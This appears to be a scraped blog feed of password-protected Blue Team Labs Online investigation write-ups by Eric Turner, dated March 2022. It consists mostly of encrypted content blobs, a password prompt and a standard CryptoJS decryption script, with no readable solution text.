Q9mbzSA6TVW1HdNXVlqqJfbxw2m+6bgZig8oNAJ8iumrEQf+vbmVglVBykNUR75A900qUrcLzDoGKNwpnzPeTd3t+q7wFvd9G7VjJHKhUtjjM485boE1VyO2kOJhdm4MFv1J8oZBQsFvMZU8vRVmOn99SRwkeb6owRXTrclXIWiK3hCRc7okwEXzRim93ZhHNHxHJBPDPYXNsuIc0BfSN6nAhXNCCPl7lKbCIWNqYTD4KAXoIuUPBZrXr6ji9uoZ54D2c6UVCQvlr48ehveCuLkcbWqcEgb3FevBB+KMYzRPo/1sctZuVA8XCxkuG4BRT7O4RSq5q7DEwiKSIpLov3yJ0LEgUs9jHrgmBIiZXRybMH5WJWZv3Ddpjn3h+EKH4OMPC+cqX8KGqWJdGbQlB+sXewI1sWfwp3RDrGxsdOAAGlL2Fh9bsmHWB+9ECIEwBU0YNNOq1zuQJUwArM1+TtpTeiSAUYwTqTHsbqoBp/ctnAPPz3V26+fGq7N5KAJMbmu/xJNQpD+fVG8wb1heRoXzIcavVyNLWhfqliyH9+hAf2Hx08mDMrmdNdWZyAoFtV/t64fria2w8yD/5hkYqP6sXndyVtfqJTWQqM8nWNXZ4fOIGS0yy9Oe3VR46NNZSemQhMx5uV9Tsje+5X8Q2T8CzfN+njERd/s06pXscJYIzQd7keHamCzp3KpuMr5DaAER3rr8Ejk4V/e7Q66noabGO2EmoupMJDeJmiprFonLfbZ8xroQCI2xWPEb8ijZIm2iQQuJwxTBbSBwLhs0VbkXFUahW677rxgPiIlWSacqHvAnQ2OuIKYGD39FN9UxPVgZkFl2Nemelr9+n9Io9rcva0cTStu+ZjcQNC7TDdNbDaCo25kes07lVz7UZMofh5BzbA9mDnM4NdgZNM9TvYmE5mbTDF8npiDUo4ZZhR4O3Mkj9I8HetE+Ck4obBJvzUNjYBMZ+tHFbAxgRGvAYozUKK8iVPf3jPdRJS5s7pzA4LZDmz0JTZ6meFX/t+e6hVzwhITBV+5nfxCKHjntpb9LZWie46NTTeV2q7kYUNxwPiBYi8o7UXx9x6K9Dxu6d5dZxqe2V0y0v+lnll/HYfzVfL+kZeq+ljKBilNG8yWhYpnDbYWleoND/MH5ufxw/nJbExdnoH1yi37/3PsoTVXzYpuUeYaWbqpAosEVD1CyLbiWNr9pczVl6SkM4i1K5vc2qoz6E8bsuKOvHkloaq1mCKSW4RR2P1Fpf+WfvdW3n64B5Hs5abwCzlWKUdx43nFgJQ/Z493VUnvdPf6rs3fbK+gSbuz5dbOFyq6Q2w/iDMKd4wGo1tNT76DPGaUPHGDZ4usSb/KaROOiUjwz8WwmBdZhpgKyvo0IfuaDTCH2qqcgp8HT9A3G7+1c3seWgIZfgLUp4yjkuIOZUzlfOzNcQkT3Sg6kKrIACLlq6SV8MS5y93HsdMFhJfiWbFoccPUxTJ9fM1s5Xq/p31KRKhKNwZrDDoM/1Me1OImTzvv3TVPmplv8glcWQHwSGszYYZDhvdNoIXxSfJPxDIJ2eWrMTQrp00tmQffluK52nxYRihuEUByWq/l9xtr/qfc8JYP25PHXREvEuVo4qZELDjlQQhmXWZagPJErDaZ3faMs2BxR2iQ4s4qKuuVmXpV9KT5fZtiZ9agICxc417zfCLwCCiRDlkKhHsPAFt9s/3K+7i8Gqu7fKJbVCKtrSOMxAE5/l+c1yY823/TtQfHzODy89Hq6wlwQyy1fisVXznCUMDE0ifC28FWo2l6DMDPSOL+pXIHN87NW7AajRL/MC4BLYFTO6X6ILduhBazvM3RFaZI07MBXDv9w7zgv7/Vg7VEUnWhEXzru0TZA52wU2oNOd/k1IqqZY9+pOA3ixjRP2p0/g4+yX6O/45glRTohZ8B4W1bWokvUP4ACtThctTlwWsO/CwlUQcDUHTIE5UqIwQbFWi15463gy4yMD0NFxaHPXQnTpObeHeFsgGwkf3pCxx4yXxzmnNZ+HyXioVwPoJewgA5FOoryZaXRCfwl6EqglaNRP2sQs3s6M6BkzaboDiOl5RimRkc4I6v1Y57UjXHdvZ7twUduDyEuu/nt6GhXnDZ725MnagxRxNxKkrNqi1mVmWzOsb//vU4tfIMxx2uZH23+oX56Q+f0kQBjVmUZdAHHO2rdeXHQ89urxA9XimRBRAwdGdC+qQR8JZahxrLW9NSMdNzhc0hfv8IVll10b9GkQXADIolAnvHt2o/TDBvzp3nqMbaG7dy1JKEBdyrRSuJAdEGXYOaCMjDqMiTi2jtlM3NLBmjUXTHGrF7bjEDgzATVuMPgephfYmsDpmG3dRAWa/z74PmslPjrVXysgBnnoINQghfd12+PA0l3090yHWyceuqWzmVR4lwtpZm0XgBzW3lv+322lA6Rv0SpOB2MEWfcoEPkdxFpjQ8Q8PQavjNTi+VFxbRrSW/NHkl8wX+7H56aKs12u7QVDzMXT7lO8e5BzReDwppkIDqffQeA6UupoH6D4gkflWCCqvjP8adKen/8THRnHYddKupYwnoF94F5HePcOo15y0X2Df7KbVoD4P/bB5TivcQsJ6PSdW7g+mIdlFa7WH3CqHebUlQfxrTo2OLilOaCArbuQBXUHWjBLOb8hZF0E4SSKCUrwSFU6kN8KF+7srSd9AZcH3chEYEZf0nLzTHPyPF8MTSWytRZF0FhyQ3k2j7nBMEIiEQrCNQV2901CKC6lNtLOHKMaw8Lo+Uzmc+ONK/omCC0H75L/ZnA+g3DHypoOcK8fpEZUhXr3R261tlbcA2oMrMdHUIJMhcxHRKEm8JLUR1s8Nt2hlt/KrLPMGtguebgbOGUPb6uNyeL9zbslCVM3iPSKOWtrd8yJwA2lh+P+e7ztdP1GrXppz6SzjpuIiWPMTaiuweVWXb84pS3dQhbo2UhFsAOj8sVmXs2oi5JqHFpQRdenAvYgmNTnYmiX1yPkNtd+p3IeFLCHC1a+kt6S/ip/LxYJOA+BcNZMD7o+R8rRpt+opr+eTuBoLs2SlRUQPiSYe6bkyWG5kzP0x0JyDWVxQNE1CzEmuqGUUwCZcZhQod4p931KMIdmnnq25V1KzG32h542KlxTtpgcbTedXBFXi8uk8ih7+tnXDnKDwAw2MkuRbYBB8i2YTj5lixSpwIl+S22wLCsg2TzaCQ8UiYd9WnoX+lRYtulDZ8Ki74USLqI0U75gfJ/LUIKLj3ZOZwq7zAqDrm4AoH2zBbnEQN7qD1Zsdb9GbaNhg0xPEEkPrzwYZ4G6qe3KFhr08Mt+p2iOvl0QDlCQ+tLKiKa9qFVMSrgXLQKEOScEA0oXypf0mQPpf7XHFOPBkPIgpvg+ZgEReMs6KvnQ8HkvHU/YBGnWBsMulSZuFfaCoOWjCImR8JPHtETPFlM5o+E3N+DbrxQTT4l+XtHS6E124fa0lcp1pRqUZI97j58ijvGLDOk2FsP1PPL06wvfyaoPT58cwuT+g9nCqi52PsNNSdVnO1EMUBJ7aXUzkXfV0wkLxS454lvXlZAACLjpO41R0B0krvr1YZuJYSOQqB9H/r86EpqtW50iykOJDc8Zxk7lXi21KzY9Qz5GA1e8M7NMdJdte4azw2yVDO0TyMxk3pIVSw1a2jjKf3+jXzsDQ5NxSvOE6HAXJKaDSabtbMsmZHVhmQAEyQPAonuIknQUD3nkhLzTY+nT57kIxjtIP0acoIQqcg2lVnPpTiBYuK8L30QbmxhkGd3MkXtz9Ts5J257ATp277i+wZKOVPYWF6MY2P4bI7Xd57UVDyGZSQ2hh6cyZepyKBkXAvfya5w5Mhp2h9qFEBA7foTESJOGM78vHpIFGS+sd1DhnXOdjWyAiteT97rqceQEOAZLFdqfLrqUvEHesFe7RsCcyhnET2YwVvEg10GPUC5XtC+Z5fDe8+rQjOskERMSGXTpD6IF/kBhoqWxOOwb33NVPGloO/E7g9zr/Ov4VC1L14cjkJe2T9vSWs6BRghJH3SrBknhXhS7Fqa8QWmt4xl1re6lXjddcywexjXQ2LfHaFddoOIC04W/8IpfQ8nVxtRNfK89LNu0Nyi6rAGHvvkYB5Fi+IcNjlCw/frXypzKF39DCTXSw/EjRd/uhvFBsG3xoF64xx3++pyJtSy8Xf4Ef24EQL0nu4lucm8GaiaFu5hNdjRhFAI8O2hIKRxE09rDOGTPitQUyoo5Q5H0M5Q/x+xpQIcYm7Jb0KXSSqyN47bC3GXWvY95gyG/qI2wYjfN82KVZ+tLsvwooeu2SGhGSV7FJq0S48D8AErslgdeRm7foSD94Ecaw+TUBW5Ya5bp9j0lW+Vj6ltkf8XpMpTZZFhBU9eiJGk4o8dYDdRkYcZMCMy/JXdWyhI7pAhhZOYlQR5afFfVk5vNJOMku52DIeUcBUttM0AXiusax8wTVzERBjQjrwL2Gwbu9/ltx23BaTbROttYac+5wXBSC2ZB/CT92+7A83DrhEVQUYIULwMuaQaQFE9jeNLpzCM1iyumLzVmzpQI+v+RFhO9nBYVfS4Q1t5C1x74+Uco0RXtzoMgygfxP4hnWf1igbdPMShBW1Kx8BT136BpWB9w+0x12OQgRu+3K6BldYnVaw+hE4VQrrnzZ16AJ6IkVronxG1PUpQqiTKsHaNaISPt6pj276SQl68dqXl6PkS44d/XK5ADRkaAKFN+HBE3B8ghX0OmKfxzx32exJJMmQlshcX9it+0gY=;^</div> <div id="pec-decrypted-content"> <h4><i>This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2022-03-31T13:07:23-04:002022-03-31T13:07:23-04:00Eric Turnertag:blog.ericturner.it,2022-03-31:/2022/03/31/btlo-challenge-source/

This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.

<div id="pec-encrypted-content" style="display:none">w1xLdbg6GMaXUpEEH/B3MQ==;9+Ccu50u5UyM2/3Ll4HtisOCLin2garqoZj8Ubkn/Fk7mdmd/AoaoyZrcfdNc3LkHmpq/Rc/B/IjxrQu3QtyuH2waoCTIiDtT0EJcqrsQdotYzNT8s4PShBqbC7v6NYU6ayVTeqQS964pAo6utfhz4Ze+qmUe8CIkmbGud1wzqgjIkbfuwOAHKRXTedA/8RnG7W1CibApKw4/ZZNoRDYcQyAEyCvrflM+mbkJ6h041FTqptr/UobUi/458/sD9uPqH51MhYcpHeRrlm0H4IvBv+cdfP3GyDjZ7YFgbhgCacfZFcKOyyGs3PmLlriY84Lyxg2bV3n75gnbrYPNb3+tmfpSPph01vTYQ5r0BmqUNDzo0S7mpnkJ4ORS/xWy2NSCLNNpGEuhyNefoZAMp40skaXtLZqM2+asPgYWS+GbBtGtPDFV5WQBnt1C42EfFvbHWR5Ai8wIavwB+QYKvEhz5kCdaOzDeX70wWyU0FqbDUBh/sVVN/Lt8LKOlppWVZ1AquCPfzLnN6iI402LyGvLpziqm2nOxKYKpswSfBK7WFm4kjrkZdovrW4tUMMYqXyih/vM3Z3g5vd00xYDsgy0Wu2mFKpKVmIWLfQxtDEAsOUAfRqkZ/i0fyeuMWKrPAq8oyC2n/e6LPGbEY3Y/IdoXCUltchNyi6I9KLv/FTS7CvADfQx9DqTfeXJPaPsKSBiiX0Hhku50fBCpLozo8hVddpZOt2HJGTHHm/ulwDGulfX8OIdbCLt8+/0uVDis9rq0sOQ+SSa26TJsmodYQfaiCOlk+kH+HEAbujmflB92lWIBMU5vp645mwYiKVzRjCcYd25GWMtn5T8dHe6wsW44UoTvd27c/x92dZUYYJp44qqbuAgDVA/aKXPZ/DY4GhogJX9irD7gAT4qhycQaQ+6gKOoyP0Gws/Zl77ujPQOj/uADSCOsKIqYTbcQhsp6EZ6ja+izZHzTDUydH5dF7Xt8ktI12922OOX2Ne+z5G6ojxMwWZMBqk585aO06N8twZyGcsAvA81VeHzuVW1TDMgEEon9bYCjBEHjiHmLKS2EdXLimAfgf9NBFD6i2qLTJp+PAuO/02Tjtwbt4zvEhBxoQoh6ZdF7qNNefjMFYKjkeFvr0orTHYs2hgPdQRdrYEBrM+hn8ApgDwQoojfqXftfo1JB8RBsSOWCcMRS/Ukzc8i6uBY3Yac26I5TgTSrlCanfpJAv42fH6xfS3HRMvijZldY9Wu7TuftQ/aTd9LHiWe5K8ytjCmRPF6Cxfq+y;^</div> <div id="pec-decrypted-content"> <h4><i>This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2022-03-31T12:42:34-04:002022-03-31T12:42:34-04:00Eric Turnertag:blog.ericturner.it,2022-03-31:/2022/03/31/btlo-challenge-bruteforce/

This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.

<div id="pec-encrypted-content" style="display:none">CYyCHZiS43z8mFMsmEEkpw==;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;^</div> <div id="pec-decrypted-content"> <h4><i>This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var 